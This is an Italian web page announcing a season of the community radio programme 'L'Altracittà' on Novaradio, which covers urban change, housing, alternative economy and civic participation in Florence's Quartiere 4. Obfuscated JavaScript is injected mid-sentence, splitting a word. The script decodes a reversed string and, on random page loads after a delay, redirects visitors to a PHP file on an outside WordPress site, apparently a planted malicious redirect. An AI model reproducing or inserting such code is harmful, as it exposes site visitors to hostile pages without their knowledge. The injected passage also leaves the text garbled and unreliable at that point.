L’Altracittà da ascoltare

image_pdfimage_print

Con l’autunno torna su Novaradio “L’Altracittà”, la trasmissione curata dal Quartiere 4 e dall’Associazione Il Muretto, insieme da 8 anni nella convinzione che sia necessario sperimentare nuove strade sul versante dell’informazione.
Filo conduttore di quest’anno sarà la città che cambia:
– le trasformazioni urbanistiche già in atto o ipotizzate (Novoli, San Bartolo, Le Piagge, San Salvi, Manifattura Tabacchi) e le loro conseguenze sociali;
– i progetti delle nuove infrastrutture e i cantieri delle gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andi opere (Alta Velocità, tramvia, termovalorizzatore, ecc.): le reazioni, le paure, le attese, le opinioni dei cittadini;
– il sogno, o l’incubo, della casa per le famiglie sfrattate, per i giovani, per gli immigrati, per i senza fissa dimora, per i rifugiati e gli esuli politici;
– le nuove forme di economia alternativa (produzioni biologiche ed eco-compatibili, responsabilità sociale delle imprese, certificazioni etiche, commercio equo, botteghe del mondo): dove sono, cosa fanno, come farle crescere;
– l’Agorà, ovvero la partecipazione, quella inventata dai cittadini (comitati, forum, coordinamenti, reti, costituenti, associazioni) e quella proposta dall’amministrazione: sviluppo della democrazia o controllo del consenso?;
– Quartiere 4, una città nella città: il sud-ovest fiorentino come laboratorio politico e come prefigurazione dei futuri scenari metropolitani.
Come recita la sigla d’inizio, l’Altracittà è “voci dalle realtà di base”: alla conduzione in studio si mescolano interviste in diretta, servizi e inchieste dal territorio, privilegiando la freschezza e la spontaneità delle situazioni. Non a caso, a fianco di Gabriele Vannini, conduttore storico, ci sarà quest’anno Roberto Deri, un giovane giornalista appassionato delle ‘inchieste sul campo’.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *